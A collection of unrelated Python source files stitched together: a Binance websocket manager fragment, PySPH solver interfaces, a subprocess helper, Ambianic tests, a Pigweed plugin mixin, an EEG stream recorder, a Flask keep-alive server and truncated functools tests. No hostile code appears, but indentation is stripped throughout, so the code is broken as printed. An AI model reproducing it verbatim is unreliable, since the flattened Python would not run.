:param channels: provide the channels you wish to stream
:type channels: str, tuple, list, set
:param markets: provide the markets you wish to stream
:type markets: str, tuple, list, set
:return: bool
"""
logging.info("BinanceWebSocketApiManager.subscribe_to_stream(" + str(stream_id) + ", " + str(channels) +
", " + str(markets) + ") started ...")
try:
if type(channels) is str:
channels = [channels]
if type(markets) is str:
markets = [markets]
if type(channels) is set:
channels = list(channels)
if type(markets) is set:
markets = list(markets)
except KeyError:
logging.error("BinanceWebSocketApiManager.subscribe_to_stream(" + str(stream_id) + ", " + str(channels) +
", " + str(markets) + ") KeyError: setting a restart request for this stream ...")
self.stream_is_stopping(stream_id)
self.set_restart_request(stream_id)
return False
if type(self.stream_list[stream_id]['channels']) is str:
self.stream_list[stream_id]['channels'] = [self.stream_list[stream_id]['channels']]
if type(self.stream_list[stream_id]['markets']) is str:
self.stream_list[stream_id]['markets'] = [self.stream_list[stream_id]['markets']]
if type(self.stream_list[stream_id]['channels']) is set:
self.stream_list[stream_id]['channels'] = list(self.stream_list[stream_id]['channels'])
if type(self.stream_list[stream_id]['markets']) is set:
self.stream_list[stream_id]['markets'] = list(self.stream_list[stream_id]['markets'])
self.stream_list[stream_id]['channels'] = list(set(self.stream_list[stream_id]['channels'] + channels))
markets_new = []
for market in markets:
if "!" in market \
or market == "allMiniTickers" \
or market == "allTickers" \
or market == "blockheight" \
or market == "$all":
markets_new.append(market)
else:
if self.is_exchange_type('dex'):
markets_new.append(str(market).upper())
elif self.is_exchange_type('cex'):
markets_new.append(str(market).lower())
self.stream_list[stream_id]['markets'] = list(set(self.stream_list[stream_id]['markets'] + markets_new))
payload = self.create_payload(stream_id, "subscribe",
channels=self.stream_list[stream_id]['channels'],
markets=self.stream_list[stream_id]['markets'])
self.stream_list[stream_id]['subscriptions'] = self.get_number_of_subscriptions(stream_id)
# control subscription limit:
# https://github.com/binance-exchange/binance-official-api-docs/blob/5fccfd572db2f530e25e302c02be5dec12759cf9/CHANGELOG.md#2020-04-23
if self.stream_list[stream_id]['subscriptions'] > self.max_subscriptions_per_stream:
self.stop_stream_as_crash(stream_id)
error_msg = "The limit of " + str(self.max_subscriptions_per_stream) + " subscriptions per stream has " \
"been exceeded!"
logging.critical(f"BinanceWebSocketApiManager.subscribe_to_stream({str(stream_id)}) "
f"Info: {str(error_msg)}")
self.stream_is_crashing(stream_id, error_msg)
if self.throw_exception_if_unrepairable:
raise StreamRecoveryError("stream_id " + str(stream_id) + ": " + str(error_msg))
return False
for item in payload:
self.stream_list[stream_id]['payload'].append(item)
logging.info("BinanceWebSocketApiManager.subscribe_to_stream(" + str(stream_id) + ", " + str(channels) +
", " + str(markets) + ") finished ...")
return True
def unsubscribe_from_stream(self, stream_id, channels=None, markets=None):
"""
Unsubscribe channels and/or markets to an existing stream
If you provide one channel and one market, then all subscribed markets from the specific channel and all
subscribed channels from the specific markets are going to be removed!
`How are the parameter `channels` and `markets` used with
`subscriptions <https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api/unicorn_binance_websocket_api.html#unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager.BinanceWebSocketApiManager.create_stream>`_
:param stream_id: id of a stream
:type stream_id: uuid
:param channels: provide the channels you wish to stream
:type channels: str, tuple, list, set
:param markets: provide the markets you wish to stream
:type markets: str, tuple, list, set
:return: bool
"""
logging.info("BinanceWebSocketApiManager.unsubscribe_to_stream(" + str(stream_id) + ", " + str(channels) +
", " + str(markets) + ") started ...")
if markets is None:
markets = []
if channels is None:
channels = []
if type(channels) is str:
channels = [channels]
if type(markets) is str:
markets = [markets]
if type(self.stream_list[stream_id]['channels']) is str:
self.stream_list[stream_id]['channels'] = [self.stream_list[stream_id]['channels']]
if type(self.stream_list[stream_id]['markets']) is str:
self.stream_list[stream_id]['markets'] = [self.stream_list[stream_id]['markets']]
for channel in channels:
try:
self.stream_list[stream_id]['channels'].remove(channel)
except ValueError:
pass
for i in range(len(markets)):
markets[i] = markets[i].lower()
for market in markets:
if re.match(r'[a-zA-Z0-9]{41,43}', market) is None:
try:
self.stream_list[stream_id]['markets'].remove(market)
except ValueError:
pass
payload = self.create_payload(stream_id, "unsubscribe",
channels=channels, markets=markets)
for item in payload:
self.stream_list[stream_id]['payload'].append(item)
self.stream_list[stream_id]['subscriptions'] = self.get_number_of_subscriptions(stream_id)
logging.info("BinanceWebSocketApiManager.unsubscribe_to_stream(" + str(stream_id) + ", " + str(channels) +
", " + str(markets) + ") finished ...")
return True
def wait_till_stream_has_started(self, stream_id):
"""
Returns `True` as soon a specific stream has started
:param stream_id: id of a stream
:type stream_id: uuid
:return: bool
"""
# will return `True` as soon the stream received the first data row
try:
while self.stream_list[stream_id]['last_heartbeat'] is None:
time.sleep(0.1)
return True
except KeyError:
return False
def wait_till_stream_has_stopped(self, stream_id):
"""
Returns `True` as soon a specific stream has stopped itself
:param stream_id: id of a stream
:type stream_id: uuid
:return: bool
"""
try:
while self.stream_list[stream_id]['has_stopped'] is False:
time.sleep(0.1)
return True
except KeyError:
return False
|
solver_interfaces.py
|
import threading
import os
import socket
import sys
try:
from SimpleXMLRPCServer import (SimpleXMLRPCServer,
SimpleXMLRPCRequestHandler)
from SimpleHTTPServer import SimpleHTTPRequestHandler
except ImportError:
# Python 3.x
from xmlrpc.server import SimpleXMLRPCServer, SimpleXMLRPCRequestHandler
from http.server import SimpleHTTPRequestHandler
from multiprocessing.managers import BaseManager, BaseProxy
def get_authkey_bytes(authkey):
if isinstance(authkey, bytes):
return authkey
else:
return authkey.encode('utf-8')
class MultiprocessingInterface(BaseManager):
""" A multiprocessing interface to the solver controller
This object exports a controller instance proxy over the multiprocessing
interface. Control actions can be performed by connecting to the interface
and calling methods on the controller proxy instance """
def __init__(self, address=None, authkey=None):
authkey = get_authkey_bytes(authkey)
super().__init__(address, authkey)
self.authkey = authkey
self._server = None
def stop(self):
if self._server:
conn = self._Client(self._address, authkey=self._authkey)
try:
self._server.shutdown(conn)
finally:
conn.close()
elif hasattr(self, 'shutdown'):
self.shutdown()
def get_controller(self):
return self.controller
def start(self, controller):
self.controller = controller
self.register('get_controller', self.get_controller)
if sys.platform == 'win32':
self.start()
else:
self._server = self.get_server()
self._server.serve_forever()
class MultiprocessingClient(BaseManager):
""" A client for the multiprocessing interface
Override the run() method to do appropriate actions on the proxy
instance of the controller object or add an interface using the
add_interface methods similar to the Controller.add_interface method """
def __init__(self, address=None, authkey=None, serializer='pickle',
start=True):
authkey = get_authkey_bytes(authkey)
BaseManager.__init__(self, address, authkey, serializer)
if start:
self.start()
def start(self, connect=True):
self.interfaces = []
# to work around a python caching bug
# http://stackoverflow.com/questions/3649458/broken-pipe-when-using-python-multiprocessing-managers-basemanager-syncmanager
if self.address in BaseProxy._address_to_local:
del BaseProxy._address_to_local[self.address][0].connection
self.register('get_controller')
if connect:
self.connect()
self.controller = self.get_controller()
self.run(self.controller)
@staticmethod
def is_available(address):
try:
socket.create_connection(address, 1).close()
return True
except socket.error:
return False
def run(self, controller):
pass
def add_interface(self, callable):
""" This makes it act as substitute for the actual command_manager """
thr = threading.Thread(target=callable, args=(self.controller,))
thr.daemon = True
thr.start()
return thr
class CrossDomainXMLRPCRequestHandler(SimpleXMLRPCRequestHandler,
SimpleHTTPRequestHandler):
""" SimpleXMLRPCRequestHandler subclass which attempts to do CORS
CORS is Cross-Origin-Resource-Sharing (http://www.w3.org/TR/cors/)
which enables xml-rpc calls from a different domain than the xml-rpc server
(such requests are otherwise denied)
"""
def do_OPTIONS(self):
""" Implement the CORS pre-flighted access for resources """
self.send_response(200)
self.send_header("Access-Control-Allow-Origin", "*")
self.send_header("Access-Control-Allow-METHODS", "POST,GET,OPTIONS")
# self.send_header("Access-Control-Max-Age", "60")
self.send_header("Content-length", "0")
self.end_headers()
def do_GET(self):
""" Handle http requests to serve html/image files only """
print(self.path, self.translate_path(self.path))
permitted_extensions = ['.html', '.png', '.svg', '.jpg', '.js']
if not os.path.splitext(self.path)[1] in permitted_extensions:
self.send_error(404, 'File Not Found/Allowed')
else:
SimpleHTTPRequestHandler.do_GET(self)
def end_headers(self):
""" End response header with adding Access-Control-Allow-Origin
This is done to enable CORS request from all clients """
self.send_header("Access-Control-Allow-Origin", "*")
SimpleXMLRPCRequestHandler.end_headers(self)
class XMLRPCInterface(SimpleXMLRPCServer):
""" An XML-RPC interface to the solver controller
Currently cannot work with objects which cannot be marshalled
(which is basically most custom classes, most importantly
ParticleArray and numpy arrays) """
def __init__(self, addr, requestHandler=CrossDomainXMLRPCRequestHandler,
logRequests=True, allow_none=True,
encoding=None, bind_and_activate=True):
SimpleXMLRPCServer.__init__(self, addr, requestHandler, logRequests,
allow_none, encoding, bind_and_activate)
def stop(self):
self.server_close()
def start(self, controller):
self.register_instance(controller, allow_dotted_names=False)
self.register_introspection_functions()
self.serve_forever()
class CommandlineInterface(object):
""" command-line interface to the solver controller """
def start(self, controller):
while True:
try:
try:
inp = raw_input('pysph[%d]>>> ' % controller.get('count'))
except NameError:
inp = input('pysph[%d]>>> ' % controller.get('count'))
cmd = inp.strip().split()
try:
cmd, args = cmd[0], cmd[1:]
except Exception as e:
print('Invalid command')
self.help()
continue
args2 = []
for arg in args:
try:
arg = eval(arg)
except:
pass
finally:
args2.append(arg)
if cmd == 'p' or cmd == 'pause':
controller.pause_on_next()
elif cmd == 'c' or cmd == 'cont':
controller.cont()
elif cmd == 'g' or cmd == 'get':
print(controller.get(args[0]))
elif cmd == 's' or cmd == 'set':
print(controller.set(args[0], args2[1]))
elif cmd == 'q' or cmd == 'quit':
break
else:
print(getattr(controller, cmd)(*args2))
except Exception as e:
self.help()
print(e)
def help(self):
print('''Valid commands are:
p | pause
c | cont
g | get <name>
s | set <name> <value>
q | quit -- quit commandline interface (solver keeps running)''')
|
simple_subprocess.py
|
import subprocess as sys_subprocess
import threading
import io
import sys
class SubprocessFailed(RuntimeError):
def __init__(self, command, returncode):
self.command = command
self.returncode = returncode
def __str__(self):
return (
f"Encoder failed with return code {self.returncode!r}"
f" (command: {self.command!r})"
)
def subprocess(command, input_iterator):
"""Run a subprocess, yield its stdout.
Feeds bytes from input_iterator to the process in a separate thread.
Writes stderr of the process to our own stderr."""
def feeder(proc, input_iterator):
try:
for chunk in input_iterator:
proc.stdin.write(chunk)
except BrokenPipeError:
pass
finally:
proc.stdin.close()
def stderr_reader(proc):
while True:
block = proc.stderr.read(io.DEFAULT_BUFFER_SIZE)
if not block:
break
else:
sys.stderr.write(block.decode("utf-8"))
proc = sys_subprocess.Popen(
command,
bufsize=0,
stdout=sys_subprocess.PIPE,
stdin=sys_subprocess.PIPE,
stderr=sys_subprocess.PIPE,
)
try:
stdin_thread = threading.Thread(target=feeder, args=(proc, input_iterator))
stdin_thread.start()
stderr_thread = threading.Thread(target=stderr_reader, args=(proc,))
stderr_thread.start()
while True:
block = proc.stdout.read(io.DEFAULT_BUFFER_SIZE)
if not block:
break
else:
yield block
finally:
if proc.poll() is None:
proc.terminate()
try:
proc.wait(3)
except sys_subprocess.TimeoutExpired:
proc.kill()
if proc.returncode != 0:
stderr_thread.join(3)
raise SubprocessFailed(command, proc.returncode)
|
test_startup.py
|
import os
import signal
import threading
import time
from pathlib import Path
import ambianic
import pytest
from ambianic import __main__, config, load_config
from ambianic.server import AmbianicServer
from ambianic.util import ManagedService, ServiceExit
@pytest.fixture
def my_dir():
return os.path.dirname(os.path.abspath(__file__))
def test_no_work_dir():
with pytest.raises(AssertionError):
AmbianicServer(work_dir=None)
def test_bad_work_dir():
srv = AmbianicServer(work_dir="/_/_/_dir_does_not_exist___")
with pytest.raises(AssertionError):
srv.start()
class MockAmbianicServer(AmbianicServer):
def __init__(self, work_dir=None, heartbeat_flag=None):
super().__init__(work_dir)
self._heartbeat_flag = heartbeat_flag
self._main_heartbeat_logged = False
self.config_changed = False
def _heartbeat(self):
super()._heartbeat()
if self._heartbeat_flag:
self._heartbeat_flag.set()
def _log_heartbeat(self):
super()._log_heartbeat()
self._main_heartbeat_logged = True
def dispatch(self, event):
super().dispatch(event)
self.config_changed = True
def _start_mock_server(**kwargs):
srv = MockAmbianicServer(**kwargs)
t = threading.Thread(target=srv.start, daemon=True)
t.start()
return (srv, t)
def _stop_mock_server(server=None, thread=None):
assert server
assert thread
server.stop()
thread.join(timeout=10)
assert not thread.is_alive()
def test_no_pipelines(my_dir):
load_config(os.path.join(my_dir, "test-config-no-pipelines.yaml"), clean=True)
assert config.get("pipelines") is None
hb_flag = threading.Event()
srv, t = None, None
try:
srv, t = _start_mock_server(work_dir=my_dir, heartbeat_flag=hb_flag)
assert srv
assert t
hb_flag.wait(timeout=3)
assert hb_flag.is_set()
pps = srv._servers["pipelines"]
assert isinstance(pps, ambianic.pipeline.interpreter.PipelineServer)
assert not pps.pipeline_server_job.job._pipelines
finally:
_stop_mock_server(server=srv, thread=t)
def test_main(my_dir):
os.environ["AMBIANIC_DIR"] = my_dir
config.clean()
load_config(os.path.join(my_dir, "test-config-no-pipelines.yaml"), clean=True)
t = threading.Thread(target=__main__.main, daemon=True)
t.start()
t.join(timeout=1)
__main__.stop()
t.join(timeout=3)
assert not t.is_alive()
def test_system_shutdown_signal():
with pytest.raises(ServiceExit):
__main__._service_shutdown(signum=signal.SIGINT, frame=None)
class _BadPipelineServer(ManagedService):
def __init__(self, config=None, **kwargs):
super().__init__(**kwargs)
self._heal_called = False
def healthcheck(self):
super().healthcheck()
# return an old enough heartbeat time to trigger a health concern
latest_heartbeat = (
time.monotonic() - ambianic.server.MANAGED_SERVICE_HEARTBEAT_THRESHOLD - 10
)
print(f"_BadPipelineServer latest_heartbeat - now: {latest_heartbeat}")
return latest_heartbeat, "BAD"
def heal(self):
super().heal()
self._heal_called = True
def test_heartbeat_threshold(my_dir):
load_config(os.path.join(my_dir, "test-config-no-pipelines.yaml"), clean=True)
# replace default with test pipeline server
# remove all root servers which we won't test here
ambianic.server.ROOT_SERVERS.clear()
ambianic.server.ROOT_SERVERS["pipelines"] = _BadPipelineServer
srv, t = _start_mock_server(work_dir=my_dir)
t.join(timeout=2)
pps = srv._servers["pipelines"]
assert isinstance(pps, _BadPipelineServer)
assert pps._heal_called
_stop_mock_server(server=srv, thread=t)
def test_main_heartbeat_log(my_dir):
load_config(os.path.join(my_dir, "test-config-no-pipelines.yaml"), True)
# remove all root servers which we will not test here
ambianic.server.ROOT_SERVERS.clear()
# set heartbeat log interval to a small enough
# interval so the test passes faster
ambianic.server.MAIN_HEARTBEAT_LOG_INTERVAL = 0.1
srv, t = _start_mock_server(work_dir=my_dir)
t.join(timeout=2)
assert srv._main_heartbeat_logged
_stop_mock_server(server=srv, thread=t)
def test_config_change(my_dir):
config_file = os.path.join(my_dir, "test-config-no-pipelines.yaml")
load_config(config_file, True)
hb_flag = threading.Event()
srv, t = None, None
try:
srv, t = _start_mock_server(work_dir=my_dir, heartbeat_flag=hb_flag)
hb_flag.wait(timeout=3)
Path(config_file).touch()
time.sleep(3)
assert hb_flag.is_set()
assert srv.config_changed
finally:
_stop_mock_server(server=srv, thread=t)
|
plugin_mixin.py
|
# Copyright 2021 The Pigweed Authors
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
"""Window pane base class."""
import asyncio
import logging
from threading import Thread
import time
from typing import Callable, Optional
from pw_console.get_pw_console_app import get_pw_console_app
class PluginMixin:
"""Handles background task management in a Pigweed Console plugin.
Pigweed Console plugins can inherit from this class if they require running
tasks in the background. This is important as any plugin code not in its
own dedicated thread can potentially block the user interface
Example usage: ::
import logging
from pw_console.plugin_mixin import PluginMixin
from pw_console.widgets import WindowPaneToolbar
class AwesomeToolbar(WindowPaneToolbar, PluginMixin):
TOOLBAR_HEIGHT = 1
def __init__(self, *args, **kwargs):
# Call parent class WindowPaneToolbar.__init__
super().__init__(*args, **kwargs)
# Set PluginMixin to execute
# self._awesome_background_task every 10 seconds.
self.plugin_init(
plugin_callback=self._awesome_background_task,
plugin_callback_frequency=10.0,
plugin_logger_name='awesome_toolbar_plugin')
# This function will be run in a separate thread every 10 seconds.
def _awesome_background_task(self) -> bool:
time.sleep(1) # Do real work here.
if self.new_data_processed:
# If new data was processed, and the user interface
# should be updated return True.
# Log using self.plugin_logger for debugging.
self.plugin_logger.debug('New data processed')
# Return True to signal a UI redraw.
return True
# Returning False means no updates needed.
return False
Attributes:
plugin_callback: Callable that is run in a background thread.
plugin_callback_frequency: Number of seconds to wait between
executing plugin_callback.
plugin_logger: logging instance for this plugin. Useful for debugging
code running in a separate thread.
plugin_callback_future: `Future`_ object for the plugin background task.
plugin_event_loop: asyncio event loop running in the background thread.
plugin_enable_background_task: If True, keep periodically running
plugin_callback at the desired frequency. If False the background
task will stop.
.. _Future: https://docs.python.org/3/library/asyncio-future.html
"""
def plugin_init(
self,
plugin_callback: Optional[Callable[..., bool]] = None,
plugin_callback_frequency: float = 30.0,
plugin_logger_name: Optional[str] = 'pw_console_plugins',
) -> None:
"""Call this on __init__() to set plugin background task variables.
Args:
plugin_callback: Callable to run in a separate thread from the
Pigweed Console UI. This function should return True if the UI
should be redrawn after execution.
plugin_callback_frequency: Number of seconds to wait between
executing plugin_callback.
plugin_logger_name: Unique name for this plugin's Python
logger. Useful for debugging code running in a separate thread.
"""
self.plugin_callback = plugin_callback
self.plugin_callback_frequency = plugin_callback_frequency
self.plugin_logger = logging.getLogger(plugin_logger_name)
self.plugin_callback_future = None
# Event loop for executing plugin code.
self.plugin_event_loop = asyncio.new_event_loop()
self.plugin_enable_background_task = True
def plugin_start(self):
"""Function used to start this plugin's background thead and task."""
# Create an entry point for the plugin thread.
def _plugin_thread_entry():
# Disable log propagation
self.plugin_logger.propagate = False
asyncio.set_event_loop(self.plugin_event_loop)
self.plugin_event_loop.run_forever()
# Create a thread for running user code so the UI isn't blocked.
thread = Thread(target=_plugin_thread_entry, args=(), daemon=True)
thread.start()
self.plugin_logger.debug('Starting plugin: %s', self)
if self.plugin_callback is None:
return
self.plugin_enable_background_task = True
self.plugin_callback_future = asyncio.run_coroutine_threadsafe(
# This function will be executed in a separate thread.
self._plugin_periodically_run_callback(),
# Using this asyncio event loop.
self.plugin_event_loop) # type: ignore
def plugin_stop(self):
self.plugin_enable_background_task = False
async def _plugin_periodically_run_callback(self) -> None:
while self.plugin_enable_background_task:
start_time = time.time()
# Run the callback and redraw the UI if return value is True
if self.plugin_callback and self.plugin_callback():
get_pw_console_app().redraw_ui()
run_time = time.time() - start_time
await asyncio.sleep(self.plugin_callback_frequency - run_time)
|
streamRecorder.py
|
# -*- coding: utf-8 -*-
"""
Created on Sun Dec 16 22:07:08 2018
@author: Alexis
A variation from streamListener better for recording and asynchronous protocol
"""
from pylsl import StreamInlet, resolve_streams
import streamError
import threading as th
import numpy as np
import time
import math
from collections import deque
from databaseManager import Signal #pour SignalRecorder
class StreamRecorder:
def __init__(self, streamName, streamType):
self._inlet = None
self._recording = False
self._recordlength = 0
self.ts = 0
self.offset = 0
self._buffer = None
self.streamType = streamType
self.streamName = streamName
self.th = th.Thread()
self._deque = deque([])
self._fps = deque([])
def connect(self):
'''Connecte le stream listener au stream vérifaint streamType et streamName.
Renvoie si un stream à été trouvé. Peut lever une NameError
Conçu en reprenant le code du groupe de PSC précédent'''
streams = resolve_streams()
for stream in streams: #cherche parmi les flux arrivant celui qui vient de NIC
if (stream.name() == self.streamName and stream.type() == self.streamType):
self._inlet = StreamInlet(stream, 3) #garde le stream en mémoire dans "inlet"
self.offset = time.time() - self._inlet.pull_sample()[1]
return True
return False
def isRecording(self):
return self._recording
def getRecord(self):
if(self.isRecording()):
raise streamError.RecordingSreamError()
else:
return self._buffer
def getBuffer(self):
return self._buffer
def bufferAvailable(self):
if self._buffer == None:
return False
return True
def startRecord(self, ts, length):
'''lance un enregistrement de t seconde dans un thread séparé'''
if self._recording:
raise streamError.RecordingSreamError()
if self._inlet == None:
raise streamError.UnConnctedStreamError("enregistrement")
self._recording = True
self._recordlength = length
self.ts = ts
self.th = th.Thread(target = self._record)
self.th.start()
def _record(self):
times = []
samples = []
while self._recording:
s,t = self._inlet.pull_chunk(0.0)
i = len(t) - 1
i2 = 0
if i >= 0 and t[i] + self.offset >= self.ts:
while i - i2 > 1:
med = t[math.ceil((i + i2)/2)] + self.offset
if med > self.ts:
i = (i + i2)//2
else:
i2 = math.ceil((i + i2)/2)
times += t[i:]
samples += s[i:]
break
time.sleep(0.2)
while self._recording:
s, t = self._inlet.pull_chunk(0.0)
if len(t) and t[-1] + self.offset >= self.ts + self._recordlength:
i = len(t) - 1
i2 = 0
while i - i2 > 1:
med = t[math.ceil((i + i2)/2)] + self.offset
if med > self.ts + self._recordlength:
i = (i + i2)//2
else:
i2 = math.ceil((i + i2)/2)
times += t[:i]
samples += s[:i]
break
else:
times += t
samples += s
time.sleep(0.2)
self._buffer = np.concatenate((np.array([times]) + (self.offset - self.ts), np.array(samples).T ))
self._recording = False
def stopRecord(self):
self._recording = False
if self.th:
while self.th.is_alive():
time.sleep(0.01)
self._buffer = None
def listen(self, nbData):
self.stopRecord()
self._deque = deque([], nbData)
self._recording = True
self.th = th.Thread(target = self.mainloop).start()
def mainloop(self):
while self._recording:
self._actualizeData()
self._makeBuffer()
self._fps.append(time.time())
while( len(self._fps) > 0 and self._fps[-1] - self._fps[0] > 1.0):
self._fps.popleft()
def _actualizeData(self):
'''récupère les nouvelles données.'''
if(self._inlet == None):
raise streamError.UnConnctedStreamError(" récupérer des donneés ")
while True:
sample, timestamp = self._inlet.pull_sample(0.0) #8 éléctrodes + timestamp
if(sample == None):
break
sample.insert(0, timestamp)
self._deque.append(sample)
def _makeBuffer(self):
if len(self._deque) == 0:
self._innerBuffer = np.empty((0,0))
return
buffer = np.empty((len(self._deque[0]), len(self._deque)))
i = 0
for s in self._deque:
j = 0
for x in s:
buffer[j, i] = x
j += 1
i += 1
self._buffer = buffer
class SignalRecorder(StreamRecorder):
def __init__(self, streamName, streamType):
StreamRecorder.__init__(self, streamName, streamType)
self.info = None
def startRecordSignal(self, ts, length, info):
self.info = info.copy()
self.startRecord(ts, length)
def getSignal(self):
return Signal(self.getRecord(), self.info)
class QualitySignalRecorder(SignalRecorder):
def __init__(self, streamName, streamType, streamTypes):
SignalRecorder.__init__(self, streamName, streamType)
self.info = None
self._qualities = [StreamRecorder(streamName, s) for s in streamTypes]
def startRecordSignal(self, ts, length, info):
SignalRecorder.startRecordSignal(self, ts, length, info)
for s in self._qualities:
s.startRecord(ts, length)
def stopRecord(self):
SignalRecorder.stopRecord(self)
for s in self._qualities:
s.stopRecord()
def connect(self):
b = SignalRecorder.connect(self)
for s in self._qualities:
s.connect()
return b
def getSignal(self):
return Signal(self.getRecord(), self.info, [s.getRecord() for s in self._qualities])
def isRecording(self):
for s in self._qualities:
if s.isRecording():
return True
return StreamRecorder.isRecording(self)
|
keep_alive.py
|
# Converts the repl into a web server
# Which allows the bot to stay alive
# CREDITS TO BEAU FROM FREECODECAMP FOR THIS ONE
# https://www.youtube.com/watch?v=SPTfmiYiuok
from flask import Flask
from threading import Thread
app = Flask("")
@app.route("/")
def home():
return "<h1>Cosette Bot is alive</h1>"
def run():
app.run(host='0.0.0.0', port=8080)
def keep_alive():
t = Thread(target=run)
t.start()
|
test_functools.py
|
# import abc
# import builtins
# import collections
# import collections.abc
import copy
from itertools import permutations, chain
# import pickle
from random import choice
import sys
# from test import support
# import threading
import time
# import typing
import unittest
# import unittest.mock
# import os
# from weakref import proxy
# import contextlib
# from test.support.script_helper import assert_python_ok
import functools
# py_functools = support.import_fresh_module('functools', blocked=['_functools'])
# c_functools = support.import_fresh_module('functools', fresh=['_functools'])
py_functools = functools
c_functools = functools
# decimal = support.import_fresh_module('decimal', fresh=['_decimal'])
# @contextlib.contextmanager
# def replaced_module(name, replacement):
# original_module = sys.modules[name]
# sys.modules[name] = replacement
# try:
# yield
# finally:
# sys.modules[name] = original_module
def capture(*args, **kw):
"""capture all positional and keyword arguments"""
return args, kw
def signature(part):
""" return the signature of a partial object """
return (part.func, part.args, part.keywords, part.__dict__)
class MyTuple(tuple):
pass
class BadTuple(tuple):
def __add__(self, other):
return list(self) + list(other)
class MyDict(dict):
pass
class TestPartial:
def test_basic_examples(self):
p = self.partial(capture, 1, 2, a=10, b=20)
self.assertTrue(callable(p))
self.assertEqual(p(3, 4, b=30, c=40),
((1, 2, 3, 4), dict(a=10, b=30, c=40)))
p = self.partial(map, lambda x: x*10)
self.assertEqual(list(p([1,2,3,4])), [10, 20, 30, 40])
def test_attributes(self):
p = self.partial(capture, 1, 2, a=10, b=20)
# attributes should be readable
self.assertEqual(p.func, capture)
self.assertEqual(p.args, (1, 2))
self.assertEqual(p.keywords, dict(a=10, b=20))
def test_argument_checking(self):
self.assertRaises(TypeError, self.partial) # need at least a func arg
try:
self.partial(2)()
except TypeError:
pass
else:
self.fail('First arg not checked for callability')
def test_protection_of_callers_dict_argument(self):
# a caller's dictionary should not be altered by partial
def func(a=10, b=20):
return a
d = {'a':3}
p = self.partial(func, a=5)
self.assertEqual(p(**d), 3)
self.assertEqual(d, {'a':3})
p(b=7)
self.assertEqual(d, {'a':3})
def test_kwargs_copy(self):
# Issue #29532: Altering a kwarg dictionary passed to a constructor
# should not affect a partial object after creation
d = {'a': 3}
p = self.partial(capture, **d)
self.assertEqual(p(), ((), {'a': 3}))
d['a'] = 5
self.assertEqual(p(), ((), {'a': 3}))
def test_arg_combinations(self):
# exercise special code paths for zero args in either partial
# object or the caller
p = self.partial(capture)
self.assertEqual(p(), ((), {}))
self.assertEqual(p(1,2), ((1,2), {}))
p = self.partial(capture, 1, 2)
self.assertEqual(p(), ((1,2), {}))
self.assertEqual(p(3,4), ((1,2,3,4), {}))
def test_kw_combinations(self):
# exercise special code paths for no keyword args in
# either the partial object or the caller
p = self.partial(capture)
self.assertEqual(p.keywords, {})
self.assertEqual(p(), ((), {}))
self.assertEqual(p(a=1), ((), {'a':1}))
p = self.partial(capture, a=1)
self.assertEqual(p.keywords, {'a':1})
self.assertEqual(p(), ((), {'a':1}))
self.assertEqual(p(b=2), ((), {'a':1, 'b':2}))
# keyword args in the call override those in the partial object
self.assertEqual(p(a=3, b=2), ((), {'a':3, 'b':2}))
def test_positional(self):
# make sure positional arguments are captured correctly
for args in [(), (0,), (0,1), (0,1,2), (0,1,2,3)]:
p = self.partial(capture, *args)
expected = args + ('x',)
got, empty = p('x')
self.assertTrue(expected == got and empty == {})
def test_keyword(self):
# make sure keyword arguments are captured correctly
for a in ['a', 0, None, 3.5]:
p = self.partial(capture, a=a)
expected = {'a':a,'x':None}
empty, got = p(x=None)
self.assertTrue(expected == got and empty == ())
def test_no_side_effects(self):
# make sure there are no side effects that affect subsequent calls
p = self.partial(capture, 0, a=1)
args1, kw1 = p(1, b=2)
self.assertTrue(args1 == (0,1) and kw1 == {'a':1,'b':2})
args2, kw2 = p()
self.assertTrue(args2 == (0,) and kw2 == {'a':1})
def test_error_propagation(self):
def f(x, y):
x / y
self.assertRaises(ZeroDivisionError, self.partial(f, 1, 0))
self.assertRaises(ZeroDivisionError, self.partial(f, 1), 0)
self.assertRaises(ZeroDivisionError, self.partial(f), 1, 0)
self.assertRaises(ZeroDivisionError, self.partial(f, y=0), 1)
# def test_weakref(self):
# f = self.partial(int, base=16)
# p = proxy(f)
# self.assertEqual(f.func, p.func)
# f = None
# self.assertRaises(ReferenceError, getattr, p, 'func')
def test_with_bound_and_unbound_methods(self):
data = list(map(str, range(10)))
join = self.partial(str.join, '')
self.assertEqual(join(data), '0123456789')
join = self.partial(''.join)
self.assertEqual(join(data), '0123456789')
def test_nested_optimization(self):
partial = self.partial
inner = partial(signature, 'asdf')
nested = partial(inner, bar=True)
flat = partial(signature, 'asdf', bar=True)
self.assertEqual(signature(nested), signature(flat))
def test_nested_partial_with_attribute(self):
# see issue 25137
partial = self.partial
def foo(bar):
return bar
p = partial(foo, 'first')
p2 = partial(p, 'second')
p2.new_attr = 'spam'
self.assertEqual(p2.new_attr, 'spam')
def test_repr(self):
args = (object(), object())
args_repr = ', '.join(repr(a) for a in args)
kwargs = {'a': object(), 'b': object()}
kwargs_reprs = ['a={a!r}, b={b!r}'.format(**kwargs),
'b={b!r}, a={a!r}'.format(**kwargs)]
if self.partial in (c_functools.partial, py_functools.partial):
name = 'functools.partial'
else:
name = self.partial.__name__
f = self.partial(capture)
self.assertEqual(f'{name}({capture!r})', repr(f))
f = self.partial(capture, *args)
self.assertEqual(f'{name}({capture!r}, {args_repr})', repr(f))
f = self.partial(capture, **kwargs)
self.assertIn(repr(f),
[f'{name}({capture!r}, {kwargs_repr})'
for kwargs_repr in kwargs_reprs])
f = self.partial(capture, *args, **kwargs)
self.assertIn(repr(f),
[f'{name}({capture!r}, {args_repr}, {kwargs_repr})'
for kwargs_repr in kwargs_reprs])
# def test_recursive_repr(self):
# if self.partial in (c_functools.partial, py_functools.partial):
# name = 'functools.partial'
# else:
# name = self.partial.__name__
# f = self.partial(capture)
# f.__setstate__((f, (), {}, {}))
# try:
# self.assertEqual(repr(f), '%s(...)' % (name,))
# finally:
# f.__setstate__((capture, (), {}, {}))
# f = self.partial(capture)
# f.__setstate__((capture, (f,), {}, {}))
# try:
# self.assertEqual(repr(f), '%s(%r, ...)' % (name, capture,))
# finally:
# f.__setstate__((capture, (), {}, {}))
# f = self.partial(capture)
# f.__setstate__((capture, (), {'a': f}, {}))
# try:
